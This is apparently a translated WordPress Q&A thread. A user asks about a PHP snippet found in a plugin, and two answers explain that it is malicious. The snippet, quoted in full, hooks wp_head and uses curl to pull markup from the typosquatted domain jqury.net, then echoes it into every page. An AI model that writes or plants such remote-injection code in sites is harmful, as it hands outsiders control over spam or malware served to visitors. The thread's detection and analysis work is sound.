Achei isso em um plugin. O que isso faz? é perigoso?

16

Eu encontrei isso em um plugin. O que isso faz? é perigoso?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
    
por Sofia Rose 01.08.2013 / 01:16

2 respostas

16

Ele carrega um bloco de marcação contendo spam (eu pensei em postar um pouco da fonte, mas eu não quero anunciar o conteúdo de forma alguma) de um domínio que é um erro ortográfico próximo do domínio-- http://jquery.com/ - usado pelo jQuery, uma biblioteca Javascript respeitável e popular e uma que o WordPress inclui no Core. Eu acho que a idéia é parecer estar carregando essa biblioteca, quando na verdade carregando algo muito diferente.

E, de outras formas, parece estar a carregar o jQuery. Observe o nome da variável $jquery .

Ele também pode tentar carregar scripts maliciosos. Eu não chequei. Eu iria definitivamente chamar isso de perigoso, especialmente porque o conteúdo dessa página pode mudar sempre que os controladores de domínio se sentirem assim.

Na melhor das hipóteses, isso danificará seu site, pois os mecanismos de pesquisa menosprezam sites que espalham spam.

Não use. Não faz nada benéfico para você ou para qualquer outra pessoa na web que não seja as pessoas que administram o site. Se você achou isso em um site respeitável, denuncie para eles.

    
por s_ha_dum 01.08.2013 / 01:31
7

Sim, é um código perigoso, carregando conteúdo de um site de spam.

Você não nomeou o plug-in, mas se você encontrou este código depois que ele foi instalado em seu site, é possível que o código do plug-in não tenha sido desse desenvolvedor, mas foi invadido depois que foi criado instalado. Se este for o caso, você pode encontrar o código malicioso em mais do seu site do que apenas este plugin.

Verifique o código do plug-in baixado de onde você adquiriu o plug-in originalmente e veja se esse código malicioso estava lá originalmente. Caso contrário, seu site foi invadido. Se você determinar que, para ser o caso, leia este artigo do Codex .

    
por Ben Miller 01.08.2013 / 02:43